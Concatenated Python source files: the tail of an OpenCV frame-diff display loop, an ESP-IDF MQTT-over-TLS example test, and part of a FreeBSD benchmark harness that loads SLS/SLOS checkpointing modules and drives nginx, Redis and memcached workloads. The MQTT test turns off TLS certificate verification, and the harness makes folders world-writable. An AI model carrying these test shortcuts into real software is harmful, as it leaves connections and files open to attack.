t1.setDaemon(True)
t2 = threading.Thread(target=_inference)
t2.setDaemon(True)
t1.start()
t2.start()
while True:
# cv2.imshow("raw", input_image[0, ..., :3])
cv2.imshow("comp", np.mean([
input_image[0, ..., :3],
input_image[0, ..., 3:]], axis=0).astype(np.uint8))
_pre = frame_list[-diff_step].astype(np.float)
_post = frame_list[-1].astype(np.float)
diff = np.mean([_pre, _post], axis=0).astype(np.uint8)
# diff = np.mean(
# list(frame_list)[::-diff_step][:10], axis=0).astype(np.uint8)
# output_image_overwrap = np.mean(
# [input_image[0, ..., 3:], output_image], axis=0).astype(np.uint8)
cv2.imshow("diff", diff)
cv2.imshow("output", output_image)
key = cv2.waitKey(2)
if key == 27:
# imageio.imsave("../test.png", output_image)
break
|
mqtt_ssl_example_test.py
|
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
import re
import os
import sys
import ssl
import paho.mqtt.client as mqtt
from threading import Thread, Event
from tiny_test_fw import DUT
import ttfw_idf
event_client_connected = Event()
event_stop_client = Event()
event_client_received_correct = Event()
event_client_received_binary = Event()
message_log = ""
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
event_client_connected.set()
client.subscribe("/topic/qos0")
def mqtt_client_task(client):
while not event_stop_client.is_set():
client.loop()
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
global message_log
global event_client_received_correct
global event_client_received_binary
if msg.topic == '/topic/binary':
binary, bin_size = userdata
print('Receiving binary from esp and comparing with {}, size {}...'.format(binary, bin_size))
with open(binary, 'rb') as f:
bin = f.read()
if bin[:bin_size] == msg.payload[:bin_size]:
print('...matches!')
event_client_received_binary.set()
return
recv_binary = binary + '.received'
with open(recv_binary, 'w') as fw:
fw.write(msg.payload)
raise ValueError('Received binary (saved as: {}) does not match the original file: {}'.format(recv_binary, binary))
payload = msg.payload.decode()
if not event_client_received_correct.is_set() and payload == "data":
client.subscribe("/topic/binary")
client.publish("/topic/qos0", "send binary please")
if msg.topic == "/topic/qos0" and payload == "data":
event_client_received_correct.set()
message_log += "Received data:" + msg.topic + " " + payload + "\n"
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_ssl(env, extra_data):
broker_url = ""
broker_port = 0
"""
steps:
1. join AP and connects to ssl broker
2. Test connects a client to the same broker
3. Test evaluates python client received correct qos0 message
4. Test ESP32 client received correct qos0 message
5. Test python client receives binary data from running partition and compares it with the binary
"""
dut1 = env.get_dut("mqtt_ssl", "examples/protocols/mqtt/ssl", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_ssl.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("mqtt_ssl_bin_size", "{}KB"
.format(bin_size // 1024))
ttfw_idf.check_performance("mqtt_ssl_size", bin_size // 1024, dut1.TARGET)
# Look for host:port in sdkconfig
try:
value = re.search(r'\:\/\/([^:]+)\:([0-9]+)', dut1.app.get_sdkconfig()["CONFIG_BROKER_URI"])
broker_url = value.group(1)
broker_port = int(value.group(2))
bin_size = min(int(dut1.app.get_sdkconfig()['CONFIG_BROKER_BIN_SIZE_TO_SEND']), bin_size)
except Exception:
print('ENV_TEST_FAILURE: Cannot find broker url in sdkconfig')
raise
client = None
# 1. Test connects to a broker
try:
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.user_data_set((binary_file, bin_size))
client.tls_set(None,
None,
None, cert_reqs=ssl.CERT_NONE, tls_version=ssl.PROTOCOL_TLSv1_2, ciphers=None)
client.tls_insecure_set(True)
print("Connecting...")
client.connect(broker_url, broker_port, 60)
except Exception:
print("ENV_TEST_FAILURE: Unexpected error while connecting to broker {}: {}:".format(broker_url, sys.exc_info()[0]))
raise
# Starting a py-client in a separate thread
thread1 = Thread(target=mqtt_client_task, args=(client,))
thread1.start()
try:
print("Connecting py-client to broker {}:{}...".format(broker_url, broker_port))
if not event_client_connected.wait(timeout=30):
raise ValueError("ENV_TEST_FAILURE: Test script cannot connect to broker: {}".format(broker_url))
dut1.start_app()
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
print('ENV_TEST_FAILURE: Cannot connect to AP')
raise
print("Checking py-client received msg published from esp...")
if not event_client_received_correct.wait(timeout=30):
raise ValueError('Wrong data received, msg log: {}'.format(message_log))
print("Checking esp-client received msg published from py-client...")
dut1.expect(re.compile(r"DATA=send binary please"), timeout=30)
print("Receiving binary data from running partition...")
if not event_client_received_binary.wait(timeout=30):
raise ValueError('Binary not received within timeout')
finally:
event_stop_client.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mqtt_ssl()
|
run.py
|
#!/usr/bin/env python3
import configargparse
import subprocess
import os
import pwd
import threading
import shutil
import errno
import select
import urllib
import json
import time
import http.server
import socketserver
import sys
import random
import datetime
from enum import Enum
from os import path
from os import listdir
from os.path import isfile, join
from pwd import getpwnam
from pathlib import Path
# Needed for benchmarking Firefox
from selenium.webdriver import Firefox, FirefoxProfile
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support import expected_conditions as expected
from selenium.webdriver.support.wait import WebDriverWait
# Captured output can be disabled (None), capture a single command in which only one file is needed
# or multiple commands in case a directory is needed to store the output
class CapturedOut(Enum):
NONE = 0
SINGLE = 1
MULTI = 2
# ====== PARSER CONFIGURATION ======
# Set the arguments for mounting a filesystem for benchmarking/use
def set_defaults_mount(p):
p.add('--disks', metavar='d1,d2,etc', required=True, action="append",
help='Comma separated values of disk devices')
p.add(
'--stripe',
required=True,
help='Size of stripe of geom layer in bytes')
p.add('--type', required=True, metavar='n',
help='Type of filesystem to benchmark (or memory)',
choices=['slos', 'zfs', 'ffs', 'memory'])
p.add('--mountdir', required=True, metavar='md',
help='Directory to mount onto')
p.add('--stripename', required=True, metavar='n',
help='name of stripe device')
# Set the defaults for the SLS module
def set_defaults_sls(p):
p.add('--slsperiod', required=True, metavar='slsperiod',
help="SLS checkpointing period in milliseconds (0 for one checkpoint)")
p.add('--oid', required=True, metavar='oid',
help="SLS partition OID")
p.add('--delta', default=True, required=False, metavar='delta',
help="SLS delta checkpointing")
p.add('--recursive', default=True, required=False, metavar='recursive',
help="SLS checkpoints all descendants of processes")
p.add('--slsctl', required=True, metavar='slsctl',
help='Path to the slsctl tool')
p.add('--clients', metavar='h1,h2,etc', required=True, action="append",
help='Comma separated values of client hosts')
p.add('--ignore_unlinked', metavar='ignore_unlinked', required=False, default=True, action="store",
help='Ignore unlinked files when checkpointed')
# Set the defaults for the SLOS module
def set_defaults_slos(p):
p.add('--checksum', default=False, action="store_true",
help="Checksumming on")
p.add('--compress', default=False, action="store_true",
help="Turn on compress")
p.add_argument('--withgstat', required=False, action='store_true',
help="Capture gstat")
p.add('--checkpointtime', required=True, metavar='checkpointtime',
help="Number of ms between SLOS checkpoints")
def set_defaults_bench(p):
p.add('--benchaddr', required=False, metavar='benchaddr',
help="Address on which the benchmark server runs")
p.add('--benchport', required=False, metavar='benchport',
help="Address on which the benchmark port runs")
p.add('--sshaddr', required=False, metavar='sshaddr',
help="Address of benchmarking client")
p.add('--sshport', required=False, metavar='sshport',
help="Port of benchmarking client")
p.add('--sshkey', required=True, metavar='sshkey',
help='Key used for sshing into remotes')
p.add('--sshuser', required=True, metavar='sshuser',
help='Remote user name for sshing into for benchmarks')
def set_defaults_stats(p):
p.add('--runno', required=False, metavar='runno', default='0',
help='Run number')
p.add('--runstart', required=False, metavar='runstart', default='0',
help='Beginning of run')
p.add('--runend', required=False, metavar='runend', default='0',
help='End of run')
p.add('--ckpt_done', required=False, metavar='ckpt_done', default='0',
help='Checkpoints successfully done')
p.add('--ckpt_attempted', required=False, metavar='ckpt_attempted',
default='0', help='Checkpoints attempted')
p.add('--slsfreq', required=False, metavar='slsfreq',
default='0', help='slsfreq')
def set_defaults(p):
p.add('-c', '--config', required=False, is_config_file=True,
help='Path to config')
p.add('--slsmodule', required=True, metavar='sls',
help='Path to sls module')
p.add('--slosmodule', required=True,
metavar='slos', help='Path to slos module')
p.add('--newfs', required=True, metavar='newfs', help='Path to newfs tool')
p.add('--runs', default=1, type=int, required=False, help="Number of runs")
p.add('--nounload', default=False, action="store_true",
required=False, help="Unload after benchmark")
set_defaults_mount(p)
set_defaults_sls(p)
set_defaults_slos(p)
set_defaults_bench(p)
set_defaults_stats(p)
# Wrapper for print_help() that drops all arguments
def help_msg(options):
parser.print_help()
# Define the parsers.
parser = configargparse.ArgParser(add_help=True)
parser.set_defaults(func=help_msg)
subparser = parser.add_subparsers(parser_class=configargparse.ArgParser)
# Build a new command for running a benchmark.
def Command(captureOut=CapturedOut.NONE, required=[], help="", add_args=[]):
def real(func):
# A global parser imported by the module
global parser
global subparser
# Unpacks the arguments to the function
def wrapper(*args, **kwargs):
func(*args, **kwargs)
name = func.__name__
h = help
if len(required) > 0 and h == "":
raise Exception(
"Please add a help message for the command {}" % name)
elif h == "":
h = "No extra arguments required"
# New parser just for this command
p = subparser.add_parser(name, help=h,
default_config_files=['benchmarks/sls.conf'])
set_defaults(p)
# Add default names for the output file/directory if needed
if captureOut == CapturedOut.SINGLE:
p.add('-o', required=False, metavar='f.out',
help='File to capture command output')
elif captureOut == CapturedOut.MULTI:
p.add('-o', required=False, metavar='dirout',
help='Directory to capture command output')
# Add any more configuration options needed.
for x in required:
p.add_argument(x)
for x in add_args:
p.add(*x[0], **x[1])
# The function to be actually executed
p.set_defaults(func=func)
return wrapper
return real
# ====== BASIC SHELL COMMANDS ======
def numhosts(options):
return len(options.clients)
# Construct an SSH command for logging into a remote.
def sshcmd(options, host=-1):
sshaddr = options.sshaddr
if host != -1:
sshaddr = options.clients[host]
return ["ssh", "-i", options.sshkey, "-p", options.sshport,
"{}@{}".format(options.sshuser, options.sshaddr)]
# Run a bash command
def bashcmd(lst, fail_okay=False):
if fail_okay:
# Propagate the return code upwards
ret = subprocess.run(lst)
return ret.returncode
else:
# Throw an exception if there was an error
subprocess.run(lst).check_returncode()
return 0
def ycsbcmd(options, cmd, dbname):
basecmd = ["{}/{}".format(options.ycsb, "bin/ycsb.sh"), cmd, dbname, "-P",
"{}/workloads/{}".format(options.ycsb, options.workload), "-p",
"{}.host={}".format(dbname, options.benchaddr),
"-p", "{}.port={}".format(dbname, options.benchport),
"-p", "recordcount={}".format(options.recordcount)]
if cmd == "run":
basecmd.extend(["-threads", options.ycsbthreads, "-p",
"operationcount={}".format(options.operationcount)])
return basecmd
def mutilatecmd(options, *args):
return ["{}".format(options.mutilate),
"-s",
"{}:{}".format(options.benchaddr, options.benchport)] + list(args)
# Do a sysctl into the system
def sysctl(module, key, value):
if value is None:
return subprocess.run(["sysctl", "-n", "{}.{}".format(module, key)],
check=True,
stdout=subprocess.PIPE).stdout.decode('UTF-8').rstrip()
else:
bashcmd(["sysctl", "{}.{}={}".format(module, key, value)])
return None
def sysctl_slos(key, value=None):
return sysctl("aurora_slos", key, value)
def sysctl_sls(key, value=None):
return sysctl("aurora", key, value)
def kldload(path):
kldl = ["kldload", path]
return bashcmd(kldl, fail_okay=True)
def kldunload(path):
kldl = ["kldunload", path]
return bashcmd(kldl, fail_okay=True)
# Create the full path of the disk by prefixing its name.
def prefixdisk(options):
# Different prefixes for striped and non-striped disks
if len(options.disks) == 1:
return "/dev/{}".format(options.stripename)
else:
return "/dev/stripe/{}".format(options.stripename)
def mount(options):
# Different prefixes for striped and non-striped disks
path = prefixdisk(options)
if (options.type in ["slos", "memory"]):
cmd = ["mount", "-t", "slsfs", path, options.mountdir]
elif (options.type == "zfs"):
cmd = ["zfs", "set", "mountpoint={}".format(
options.mountdir), "{}{}".format(options.stripename, options.mountdir)]
elif (options.type == "ffs"):
cmd = ["mount", path, options.mountdir]
bashcmd(cmd)
os.chmod(options.mountdir, 0o777)
def umount(options):
if (options.type == "zfs"):
cmd = ["zfs", "destroy", "-r",
"{}{}".format(options.stripename, options.mountdir)]
bashcmd(cmd)
cmd = ["zpool", "destroy", options.stripename]
bashcmd(cmd)
else:
cmd = ["umount", options.mountdir]
bashcmd(cmd, fail_okay=True)
# Return the disk we'll use for the SLOS. If it's a geom stripe, create it.
def geom_init(options, disks, stripe):
if (options.type != "zfs"):
# Gstripe does not work with 1 disk
if len(disks) == 1:
options.stripename = disks[0]
return
create = ["gstripe", "create", "-s", stripe, "-v", options.stripename]
create.extend(disks)
destroy_geom = ["gstripe", "destroy", options.stripename]
# XXX Error checking? We have fail_okay
bashcmd(destroy_geom, fail_okay=True)
bashcmd(create, fail_okay=True)
bashcmd(destroy_geom, fail_okay=True)
if (bashcmd(create, fail_okay=True)):
print("\nERROR: Problem with loading gstripe\n")
unload(options)
exit(1)
# Create a new filesystem. This can be a regular filesystem or a SLOS
def newfs(options):
path = prefixdisk(options)
if (options.type in ["slos", "memory"]):
newf = [options.newfs, path]
bashcmd(newf)
elif (options.type == "ffs"):
newf = ["newfs", "-j", "-S", "4096", "-b", options.stripe, path]
bashcmd(newf)
elif (options.type == "zfs"):
zpool = ["zpool", "create", options.stripename]
zpool.extend(options.disks)
bashcmd(zpool)
if (options.compress):
zpool = ["zfs", "set", "compression=lz4", options.stripename]
bashcmd(zpool)
if (options.checksum):
zpool = ["zfs", "set", "checksum=on", options.stripename]
bashcmd(zpool)
else:
zpool = ["zfs", "set", "checksum=off", options.stripename]
bashcmd(zpool)
zpool = ["zfs", "set", "recordsize={}".format(options.stripe),
options.stripename]
bashcmd(zpool)
zpool = ["zfs", "create", "{}{}".format(
options.stripename, options.mountdir)]
bashcmd(zpool)
else:
raise Exception("Invalid backend {} specified".format(options.type))
# Set up all modules and filesystems.
def module_init(options):
if (options.type != "zfs"):
geom_init(options, options.disks, options.stripe)
if (options.type in ["slos", "memory"]):
if kldload(options.slosmodule):
raise Exception("SLOS module already loaded")
if kldload(options.slsmodule):
raise Exception("SLS module already loaded")
sysctl_slos("checkpointtime", options.slsperiod)
newfs(options)
mount(options)
# Clean up for the work done in module_init().
def module_fini(options):
# Needed because some benchmarks keep dumping even after they're
# supposedly done.
cmd = ['pkill', '-SIGTERM', 'dtrace']
bashcmd(cmd, fail_okay=True)
time.sleep(5)
umount(options)
if (options.type in ["slos", "memory"]):
kldunload("slos.ko")
kldunload("sls.ko")
if (options.type != "zfs"):
destroy_geom = ["gstripe", "destroy", options.stripename]
bashcmd(destroy_geom, fail_okay=True)
# ===== SLOS BENCHMARKING COMMANDS =====
# Check if the stripe already exists
def stripe_loaded(options):
return path.exists("/dev/stripe/{}".format(options.stripename))
def get_num_snaps(options):
if (options.type == "slos"):
cmd = ["../tools/fsdb/fsdb", "-s",
"/dev/stripe/{}".format(options.stripename)]
result = subprocess.run(cmd, stdout=subprocess.PIPE)
return int(result.stdout.decode('utf-8'))
else:
return 0
def gstat(name, timeout, path):
cmd = ["timeout", str(timeout), "gstat", "-C", "-f", name]
out = open(path, "w+")
subprocess.run(cmd, stdout=out)
out.close()
def startgstat(name, timeout, path):
x = threading.Thread(target=gstat, args=(name, timeout, path,))
x.start()
return x
def runbench(options, path, output):
cmd = ["filebench", "-f", path]
gthread = None
if output != "":
stdout = open(output, 'w+')
else:
stdout = None
snap = get_num_snaps(options)
if (options.withgstat and output != ""):
path = "{}.gstat.csv".format(output)
gthread = startgstat(options.stripename, 40, path)
subprocess.run(cmd, stdout=stdout)
if (output != ""):
stdout.close()
c = "fb-post.sh"
cmd = [c, output]
subprocess.run(cmd)
stdout = open(output, 'a+')
snap = get_num_snaps(options) - snap
stdout.write(str(snap))
stdout.close()
if (gthread):
gthread.join(timeout=25)
else:
snap = get_num_snaps(options) - snap
print("CHECKPOINTS COMPLETED {}".format(str(snap)))
@Command()
def load(options):
# XXX Why is having a stripe equivalent to having everything loaded?
if stripe_loaded(options):
print("Already loaded. Unload first to reload")
exit(1)
else:
module_init(options)
print("Loaded..")
@Command()
def unload(options):
if (options.nounload):
print("Unloading not permitted")
return
module_fini(options)
print("Unloaded..")
@Command(captureOut=CapturedOut.SINGLE,
required=["script"], help="filebench script as extra arg")
def benchmark(options):
if stripe_loaded(options):
print("Already loaded. Unload first to runbenchmark")
return
load(options)
outpath = ""
if options.o is not None:
outpath = options.o
runbench(options, options.script, outpath)
unload(options)
@Command(required=["dir"], captureOut=CapturedOut.MULTI,
help="script directory as extra arg")
def allbenchmarks(options):
if stripe_loaded(options):
print("Already loaded. Unload first to runbenchmark")
files = [f for f in listdir(options.dir) if isfile(join(options.dir, f))]
out = options.o
for x in range(0, int(options.runs)):
print("===== Run %s ======" % str(x))
if out:
outdir = out + "/" + str(x) + "/"
try:
os.mkdir(outdir)
os.chmod(outdir, 0o777)
except BaseException:
pass
else:
outdir = ""
for i, file in enumerate(files):
print("======= Running %s ======" % file)
print("======= [%s of %s] ======" % (i + 1, len(files)))
fullpath = options.dir + "/" + file
output = ""
if outdir:
output = outdir + "/" + file + ".out"
load(options)
runbench(options, fullpath, output)
unload(options)
@Command(required=["script", "min", "max", "steps"], captureOut=CapturedOut.MULTI,
help="Time series")
def series(options):
max = int(options.max)
min = int(options.min)
if stripe_loaded(options):
print("Already loaded. Unload first to runbenchmark")
return
for x in range(0, int(options.steps)):
value = min + (((max - min) * x) // (int(options.steps) - 1))
print("======= Running Step %s ======" % value)
options.checkps = value
if options.o:
output = "{}/{}.out".format(options.o, value)
load(options)
runbench(options, options.script, output)
unload(options)
@Command(required=["script", "min", "max", "steps"],
captureOut=CapturedOut.MULTI,
help="Time series")
def allseries(options):
outputdir = options.o
dir = options.script
files = [f for f in listdir(dir) if isfile(join(dir, f))]
for x in range(0, options.runs):
print("===== Run %s ======" % str(x))
if (outputdir != ""):
outdir = outputdir + "/" + str(x) + "/"
try:
os.mkdir(outdir)
os.chmod(outdir, 0o777)
except BaseException:
pass
else:
outdir = ""
for file in files:
if (outdir != ""):
path = "{}/{}".format(outdir, file)
try:
os.mkdir(path)
os.chmod(path, 0o777)
except BaseException:
pass
options.o = path
options.script = "{}/{}".format(dir, file)
print("======= Running File %s ======" % file)
series(options)
# ===== SLS BENCHMARKS =====
# Get the PID of the main process we're checkpointing. Benchmarks often have
# multiple processes, so we need to get the root of its process tree, assuming
# it exists. Note that we can only do this if we assume non-random PIDs, and
# even then PID allocation must not wrap around.
def pid_main(benchname):
cmd = ["pidof", benchname]
output = subprocess.run(cmd, check=True,
stdout=subprocess.PIPE).stdout.decode('UTF-8')
pids = sorted(map(int, output.strip().split()))
return pids[0]
# Create directories in the SLOS to be used by the benchmarks. By appropriately
# modifying the configuration files, and building a directory tree similar to
# that present at the root, we can ensure benchmarks only create files in the
# SLOS, and are therefore definitely checkpointable.
def make_slsdirs(options, benchmark):
folders = ["data", "log", "log/" + benchmark, "logs",
"tmp", "var", "var/cache", "var/cache/" + benchmark,
"var/run", "var/run/" + benchmark, benchmark]
for folder in folders:
path = "{}/{}".format(options.mountdir, folder)
try:
Path(path).mkdir(exist_ok=True)
except OSError as err:
# It's fine if the file already exists
if err.errno != errno.EEXIST:
print("Error {} creating folder {}".format(err, folder))
raise
# Insert a series of PIDs into a partition and start checkpointing them.
def slsckpt(options, pidlist):
print("Starting Aurora Checkpointer on {} (period {})".format(
str(pidlist), options.slsperiod))
# If period is 0 we do not put the PIDs in the SLS.
if options.slsperiod == 0:
return
if not (options.type in ["slos", "memory"]):
raise Exception("Invalid SLS backend {}".format(options.type))
cmd = [options.slsctl, "partadd",
"-o", options.oid, "-b", options.type,
"-t", str(options.slsperiod)]
if options.delta:
cmd.append("-d")
if options.ignore_unlinked:
cmd.append("-i")
bashcmd(cmd)
for pid in pidlist:
cmd = [options.slsctl, "attach", "-o", options.oid, "-p", str(pid)]
bashcmd(cmd)
cmd = [options.slsctl, "checkpoint", "-o", options.oid]
if options.recursive:
cmd.append("-r")
bashcmd(cmd)
print("Started Aurora Checkpointer on {}".format(str(pidlist)))
# Generate a configuration from a template
def generate_conf(options, inputconf, outputconf):
# The templated variables.
replace_list = [
["SLS_MOUNT", options.mountdir],
["SLS_SERVER_URL", options.benchaddr],
["SLS_SERVER_PORT", options.benchport]
]
# Search and replace all template strings in the files. The way we specify
# the path makes it necessary for us to be in the base SLS directory when
# running the script, we need to change it in the future.
with open(inputconf, 'r') as templatefile:
with open(outputconf, 'w+') as conffile:
for line in templatefile:
for x in replace_list:
line = line.replace(x[0], x[1])
conffile.write(line)
# Create a configuration file for the web server so that it only uses files in
# the SLS. This is needed to be able to checkpoint filesystem state.
def webserver_createconf(options, inputconf, outputconf, srvconf):
# Link the original directory used by the server into the SLOS. Done so we
# can control the working directory of the server.
os.symlink(srvconf, "{}/{}".format(options.mountdir, options.server))
# Create the folders the web server expects to find at specific places.
# We create the lighttpd/nginx configuration from a template we have
# already constructed, so the file already includes the modified folder
# paths we are creating here.
make_slsdirs(options, options.server)
# Generate the configuration file
generate_conf(options, inputconf, outputconf)
# Start the lighttpd server
def lighttpd_setup(options, inputconf, outputconf, srvconf):
# Get the current difrectory, so that we can switch back to it later.
pwd = os.getcwd()
# Create the configuration
webserver_createconf(options, inputconf, outputconf, srvconf)
os.chdir(options.mountdir)
# Start lighttpd using the new config file.
cmd = [options.lighttpd, '-f', outputconf]
bashcmd(cmd)
os.chdir(pwd)
# Get the PID of the newly created server.
return pid_main("lighttpd")
# Start the lighttpd server
def nginx_setup(options, inputconf, outputconf, srvconf):
# Get the current difrectory, so that we can switch back to it later.
pwd = os.getcwd()
# Create the configuration
webserver_createconf(options, inputconf, outputconf, srvconf)
os.chdir(options.mountdir)
# Start nginx using the new config file.
cmd = [options.nginx, '-c', outputconf]
bashcmd(cmd)
os.chdir(pwd)
# Get the PID of the newly created server. There is a master nginx process
# and a set of worker processes. Assuming non-random PIDs, the smallest PID
# is the original process, so we get the output of pidof and parse it to
# select the smallest possible process.
return pid_main("nginx")
def tomcat_setup(options):
# Call the startup script
bashcmd("{}/{}".format(options.tomcat, "/bin/startup.sh"))
options.benchport = "8080"
time.sleep(5)
return pid_main("java")
def webserver_setup(options):
# Apart from selecting the right setup function to call, set the path of
# the configuration to be used and the output configuration. No need for
# special OS path join methods, since we can only possibly run on FreeBSD
# anyway.
if options.server == "nginx":
return nginx_setup(options,
inputconf="benchmarks/nginx.conf",
outputconf="{}/{}".format(options.mountdir,
"nginx/nginx.conf"),
srvconf=options.nginxconfdir
)
elif options.server == "lighttpd":
return lighttpd_setup(options,
inputconf="benchmarks/lighttpd.conf",
outputconf="{}/{}".format(options.mountdir,
"lighttpd/lighttpd.conf"),
srvconf=options.lighttpdconfdir
)
elif options.server == "tomcat":
return tomcat_setup(options)
else:
raise Exception("Invalid server {}".format(options.server))
# Command for spinning up a webserver and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
# Default locations of the binaries and config files
['--lighttpd'],
{
"action": "store",
"default": "/usr/local/sbin/lighttpd",
"help": "Location of lighttpd"
}
],
[
['--nginx'],
{
"action": "store",
"default": "/usr/local/sbin/nginx",
"help": "Location of nginx"
}
],
[
['--tomcat'],
{
"action": "store",
"default": "/usr/local/apache-tomcat-9.0",
"help": "Location of Apache Tomcat directory"
}
],
[
['--lighttpdconfdir'],
{
"action": "store",
"default": "/usr/local/etc/lighttpd",
"help": "Location of lighttpd config dir",
}
],
[
['--nginxconfdir'],
{
"action": "store",
"default": "/usr/local/etc/nginx",
"help": "Location of nginx config dir",
}
],
[
['--server'],
{
"action": "store",
"default": "nginx",
"help": "Standard web server to use",
}
],
[
['--threads'],
{
"action": "store",
"default": "10",
"help": "Number of client threads to use"
}
],
[
['--connections'],
{
"action": "store",
"default": "50",
"help": "Number of connections used by wrk",
}
],
[
['--time'],
{
"action": "store",
"default": "10",
"help": "Duration of the benchmark in seconds",
}
],
],
help="Run a web server sls workload")
def webserver(options):
# XXX Replace with module_init?
load(options)
# Start lighttpd
pid = webserver_setup(options)
# Begin the SLS
if (options.type in ["slos", "memory"]):
slsckpt(options, [pid])
options.runstart = datetime.datetime.now()
# Run the benchmark.
ssh = sshcmd(options)
wrk = ["wrk", "-d", str(options.time), "-t", str(options.threads),
"-c", str(options.connections),
"http://{}:{}".format(options.benchaddr, options.benchport)]
wrkoutput = subprocess.run(ssh + wrk,
stdout=subprocess.PIPE).stdout.decode('UTF-8')
options.ckpt_done = int(sysctl_sls("ckpt_done"))
options.ckpt_attempted = int(sysctl_sls("ckpt_attempted"))
options.runend = datetime.datetime.now()
with open("{}_{}_{}".format(str(options.server), str(options.slsfreq),
str(options.runno)), "w") as outfile:
outfile.write(wrkoutput)
# Kill the server
cmd = ['kill', '-9', str(pid)]
bashcmd(cmd)
time_elapsed = options.runend - options.runstart
ms_elapsed = (time_elapsed.seconds * 1000) + \
(time_elapsed.microseconds / 1000)
print("Did {} checkpoints in {}ms)".format(options.ckpt_done, ms_elapsed))
# XXX Replace with module_fini?
unload(options)
def redis_setup(options):
# Get the current directory, so that we can switch back to it later.
pwd = os.getcwd()
# XXX Make them defaults with the Redis command somehow
inputconfig = "benchmarks/redis.conf"
outputconf = "{}/{}".format(options.mountdir, "redis.conf")
generate_conf(options, inputconfig, outputconf)
# Create the configuration
os.chdir(options.mountdir)
make_slsdirs(options, "redis")
# Start lighttpd using the new config file.
cmd = [options.redis, outputconf]
bashcmd(cmd)
os.chdir(pwd)
# Get the PID of the newly created server. There is a master nginx process
# and a set of worker processes. Assuming non-random PIDs, the smallest PID
# is the original process, so we get the output of pidof and parse it to
# select the smallest possible process.
return pid_main("redis-server")
def memcached_setup(options):
# Get the current directory, so that we can switch back to it later.
pwd = os.getcwd()
make_slsdirs(options, "memcached")
# Create the directory for the PID file
cmd = ["memcached", "-u", options.memcacheduser, "-l", options.benchaddr,
"-p", options.benchport, "-P", "{}/{}".format(options.mountdir,
"memcached.pid"), "-d"]
bashcmd(cmd)
# Switch back to the original directory.
os.chdir(pwd)
return pid_main("memcached")
# Command for spinning up a webserver and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
# Default locations of the binaries and config files
['--redis'],
{
"action": "store",
"default": "/usr/local/bin/redis-server",
"help": "Location of the Redis server"
}
],
[
# Default locations of the binaries and config files
['--ycsb'],
{
"action": "store",
"default": "/home/etsal/ycsb/",
"help": "Location of the YCSB directory"
}
],
[
['--recordcount'],
{
"action": "store",
"default": str(10 * 1000),
"help": "Number of records to be loaded into the database"
}
],
[
['--workload'],
{
"action": "store",
"default": "workloada",
"help": "Workload profile to be used with YCSB"}
],
[
['--kvstore'],
{
"action": "store",
"default": "redis",
"help": "The key-value store to be benchmarked",
}
],
[
['--memcached'],
{
"action": "store",
"default": "/usr/local/bin/memcached",
"help": "Location of the memcached server"
}
],
[
['--memcacheduser'],
{
"action": "store",
"default": "root",
"help": "User under which memcached runs"
}
],
[
["--ycsbthreads"],
{
"action": "store",
"default": "16",
"help": "Number of threads for the YCSB client"
}
],
[
["--operationcount"],
{
"action": "store",
"default": str(100 * 1000),
"help": "Number of target operations from the YCSB client"
}
],
],
help="Run the Redis server")
def kvstore(options):
# XXX Replace with module_init?
load(options)
# Start lighttpd
if options.kvstore == "redis":
pid = redis_setup(options)
elif options.kvstore == "memcached":
pid = memcached_setup(options)
else:
raise Exception("Invalid options.kvstore {}".format(options.kvstore))
if pid is None:
raise Exception("No PID for process")
# Warm it up using YCSB. We can do this locally, but then we would need two
# version of YCSB - one collocated with the database, and one remote.
ssh = sshcmd(options)
cmd = ycsbcmd(options, "load", options.kvstore)
ycsboutput = subprocess.run(ssh + cmd,
stdout=subprocess.DEVNULL)
# Insert the server into the SLS.
if (options.type in ["slos", "memory"]):
slsckpt(options, [pid])
options.runstart = datetime.datetime.now()
# SSH into the remote and start the benchmark.
# XXX Parse it into a form we can use for graphing.
cmd = ycsbcmd(options, "run", options.kvstore)
ycsboutput = subprocess.run(ssh + cmd,
stdout=subprocess.PIPE).stdout.decode('UTF-8')
options.ckpt_done = int(sysctl_sls("ckpt_done"))
options.ckpt_attempted = int(sysctl_sls("ckpt_attempted"))
options.runend = datetime.datetime.now()
with open("{}_{}_{}".format(str(options.kvstore), str(options.slsfreq),
str(options.runno)), "w") as outfile:
outfile.write(ycsboutput)
# Kill the server
cmd = ['kill', '-9', str(pid)]
bashcmd(cmd)
# XXX Measure time
# print("{} checkpoints (expected around {})".format(
# sysctl_sls("ckpt_done"),
# (1000 / int(options.slsperiod)) * sleeptime))
# Wait for a bit to avoid races # XXX Necessary?
time.sleep(3)
time_elapsed = options.runend - options.runstart
ms_elapsed = (time_elapsed.seconds * 1000) + \
(time_elapsed.microseconds / 1000)
print("Did {} checkpoints in {}ms)".format(options.ckpt_done, ms_elapsed))
# XXX Replace with module_fini?
unload(options)
# Command for spinning up a webserver and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
['--memcached'],
{
"action": "store",
"default": "/usr/local/bin/memcached",
"help": "Location of the memcached server"
}
],
[
['--memcacheduser'],
{
"action": "store",
"default": "root",
"help": "User under which memcached runs"
}
],
[
['--mutilate'],
{
"action": "store",
"default": "/home/ali/working/mutilate/mutilate",
"help": "Location of mutilate"
}
],
[
['--mutilatethreads'],
{
"action": "store",
"default": "12",
"help": "Number of mutilate threads"
}
]
],
help="Run the memcached/mutilate")
def mutilate(options):
load(options)
# Start mutilate
pid = memcached_setup(options)
if pid is None:
raise Exception("No PID for process")
time.sleep(1)
# Load database
ssh = sshcmd(options, host=0)
cmd = mutilatecmd(options, "--loadonly")
bashcmd(ssh + cmd)
# Insert the server into the SLS.
if (options.type in ["slos", "memory"]):
